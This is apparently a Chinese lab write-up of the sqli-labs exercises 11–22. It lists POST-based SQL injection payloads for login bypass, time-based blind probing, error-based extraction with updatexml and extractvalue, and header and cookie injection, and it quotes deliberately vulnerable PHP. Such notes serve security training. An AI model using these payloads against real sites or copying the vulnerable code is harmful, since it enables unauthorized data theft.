SQL注入之POST型常规注入

时间:2022-10-27 12:05:14

less11单引号字符型注入

注入:test' or 1=1 #&password=test

sql语句:select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1;

注入:uname=test&passwd=test' or '1'='1

sql语句:select username,password from users where username='test' and password='test' or '1'='1' limit 0,1;

less12双引号字符型变形的注入

注入:uname=a&passwd=a") or 1=1#

less13单引号变形双注入

注入:uname=a&passwd=a') or ('1')=('1

less14单引号双注入

注入:uname=a&passwd=a' or '1'='1

less15单引号盲注

注入:uname=a&passwd=a' or 1=1#

uname=a&passwd=a') or if(length(database())>7,1,sleep(7))#

less16双引号盲注

注入:uname=a&passwd=a") or if(length(database())>7,1,sleep(5))#

less17更新查询POST注入

过滤函数:check_input()

注入:

获取当前数据库:uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,database()),1)#

获取当前用户:uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select user())),1)#

获取数据表:uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select table_name from information_schema.tables where table_schema=0x7365 limit 0,1)),1)#

查看字段名:uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select conlumn_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)),1)#

查看数据:uname=admin&passwd=a' or updatexml(1,concat(0x282b5d,(select password from users where uname='admin')),1)#

less18基于头部的User-Agent注入,使用火狐插件live http headers代理工具

注入:User-Agent: Mozila/5.0 .. Firefox/46.0 or updatexml(0,concat(0x2b5e,database()),0),",")#

Firefox/46.0 or updatexml(0,concat(0x2b5e,(select email_id from emails limit 0,1)),0),",")#

less19基于头部的referer注入

注入:' or extractvalue(1,concat(0x2b,version())),")#       extractvalue函数只有两个参数,updatexml有3个

' or extractvalue(1,concat(0x2b,(select email_id from emails limit 0,1))),")#

less20基于头部的cookie注入

没有cookie,设置cookie,源码:

$uname=check_input($_POST['uname']);

$passwd=check_input($_POST['passwd']);

$sql="select users.username,users.password from users where users.username=$uname and users.password=$passwd order by users.id desc limit 0,1";

$result=mysql_query($sql);

$row=mysql_fetch_array($result);

cookie=$row['username'];

if($row){

setcookie('uname', cookie,time()+3600);

header('Location : index.php');

cookie存在,源码:

$cookee=$_COOKIE['uname'];

$sql="select * from users where username='$cookee' limit 0,1";

$result=mysql_query($sql);

$row=mysql_fetch_array($result);

若按了删除cookie的按钮,后台设置时间为过期时间,删除cookie

setcookie('uname',$row['username'],time()-3600);

header('Location:index.php');

注入:Cookie:uname=admin'

Cookie:uname=admin' order by 4#

Cookie:uname=' union select 1,2,email_id from emails#

Cookie:uname=' union select 1,2,email_id from emails limit 1,1#

less21单引号字符型变形Cookie注入

源码:$cookee=base64_decode($cookee);

$sql="select * from users where username=('$cookee') limit 0,1";

注入:Cookie:uname=') union select 1,2,email_id from emails#   //base64编码

less22双引号字符型Cookie注入

注入:Cookie:uname=" union select 1,2,email_id from emails#   //base64编码


标签:

相关文章